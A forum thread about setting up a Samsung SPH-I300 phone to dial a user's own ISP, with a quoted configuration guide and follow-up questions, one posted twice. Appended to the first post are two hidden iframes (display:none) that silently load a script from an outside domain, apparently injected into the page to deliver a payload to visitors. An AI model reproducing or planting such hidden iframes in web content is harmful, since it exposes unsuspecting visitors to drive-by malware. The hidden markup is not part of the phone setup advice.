+ Reply to Thread
    Administrator

Arrow Setting up a different network provider on your I300.

the below post is a quote from "jfreas". He got this info from level 2 support at Samsung.

Here's the deal: The SPH-I300 has a fully-functional built-in 14,400 bps modem. It can be used just like any computer modem, you just have to set up the network provider you want to call (you can set up multiple ones).

The reason using SMTP to send mail doesn't work is because most (if not all) ISPs reject mail that doesn't arrive at their server from their network. So, if you send from Sprint's network, Earthlink will reject your mail. So will Yahoo, ATT, and darn near everyone else.

The solution is simple - Dial your regular ISP directly. Here's how:

First, find and tap the "Prefs" icon.

In the top right corner of the "Preferences" screen you'll find a pull-down window (probably set to General). Tap that and select "Network".

Under the "Service" pull-down you will find several ISPs listed. If yours is one, great, if not, you can modify and rename any one of them to do what you want, just be aware that some have logon scripts set up for that particular service & you'll need to change or delete them.

When you have the Service that you want selected, input your User Name, and if desired your password. If you prefer, the phone will prompt you to enter your password each time you log on.

Make sure you have the "Connection" pull-down set to Wireless CDMA Modem.

Put your ISPs POP phone number in the "Phone" field.

Tap the "Details..." button for more options, including PPP vs SLIP access, idle timeout (when to hang up), etc.

At the bottom of the window is another button marked "Script..." where you can add logon information if needed. If you have a listed ISP like Earthlink this is not required, but if you do need to, you can set it up to look for an incoming prompt and reply with username and password info, etc.

That's it! Once you have your desired Network set up, it will be used as the default for all internet apps. If you have multiple dial-up networks that you use (home ISP and also work network), you can configure both. Set one as your default (whichever one is visible when you leave Network Prefs is the default), and just switch to the other when you need it. My only caution is that I would leave the Sprint connection alone in case you ever want to go back to using them.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

jlv

Re: Setting up a different network provider on your I300.

Under the "Service" pull-down you will find several ISPs listed. If yours is one, great, if not, you can modify and rename any one of them to do what you want, just be aware that some have logon scripts set up for that particular service & you'll need to change or delete them.
    Or, just pull down the options menu and click "New" (.-stroke N).

Things I don't know: What is "Connection: -current-" mean?
    Does the "Direct Serial" Connection allow me to do PPP over the hotsync cable? (I've wondered if that was possible).

I see that all the connections are configurable under the Prefs->Connection pulldown.

Fully Converged
    Hi all,

Shimon of TAKEphONE here...

I have a problem, wonder if anyone can help:

I have set things up as you explained, but I cant connect because
    it always asks for "provisioning data"
    When I try to follow the instructions to do that - it fails.

Reason - I live in Israel, and we do not have SPRINT here...

Is there any other way to go pass that ?

I was able to surf using the 7135 on the same operator.
    Shimon Shnitzer
    Maker of TAKEphONE for PalmOS
    www.shsh.com

Fully Converged
    Hi all,

Shimon of TAKEphONE here.

I have a problem, wonder if anyone can help:

I have done all explained above, but the device keeps asking me for "provisioning data".

I can not seem to be able to do this, since I live in Israel, and there is no SPRINT operator here...

I was able to surf using the same operator with a 7135.

Any ideas how I can go pass this ?
    Shimon Shnitzer
    Maker of TAKEphONE for PalmOS
    www.shsh.com